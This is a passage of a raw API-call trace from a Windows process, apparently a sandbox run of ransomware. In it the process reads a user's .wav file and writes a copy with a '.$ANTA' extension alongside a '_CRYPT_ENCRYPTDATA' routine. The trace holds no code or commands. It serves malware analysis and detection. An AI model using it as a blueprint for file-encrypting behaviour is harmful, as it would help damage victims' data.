lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0112.180] CryptDestroyHash (hHash=0x41ac040) returned 1 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0112.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0112.181] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0112.181] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0112.181] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0112.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0112.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0112.181] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\dle rck7Umm-.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\dle rck7umm-.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0112.181] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.181] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0112.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0112.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0112.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0112.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0112.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0112.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0112.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.182] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0112.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0112.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0112.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0112.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0112.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0112.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0112.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0112.182] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0112.182] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0112.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0112.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0112.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0112.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0112.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0112.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0112.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0112.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0112.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0112.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0112.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0112.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a42e8 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0112.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0112.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a42e8 | out: hHeap=0x1780000) returned 1 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0112.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a088 [0112.184] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u")) returned 0x10 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a088 | out: hHeap=0x1780000) returned 1 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0112.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0112.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0112.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0112.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0112.185] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\dle rck7Umm-.wav.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\dle rck7umm-.wav.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0112.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0112.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0112.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0112.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0112.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0112.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0112.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0112.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0112.185] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0112.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0112.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0112.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0112.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0112.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0112.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0112.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0112.186] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0112.186] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0112.186] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0112.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0112.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0112.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0112.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0112.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0b020 [0112.189] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0112.189] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x5975, lpOverlapped=0x0) returned 1 [0112.190] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0112.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0112.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0112.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0112.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0112.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5975) returned 0x4516010 [0112.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0112.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0112.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0112.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0112.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0112.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0112.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5975) returned 0x451b990 [0112.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0112.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0112.193] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0112.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0112.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5975) returned 0x4516010 [0112.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0112.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0112.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0112.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0112.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0112.194] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0112.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0112.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0112.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0112.194] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0112.194] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0112.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0112.194] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0112.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5975) returned 0x4516010 [0112.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0112.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0112.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0112.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0112.195] 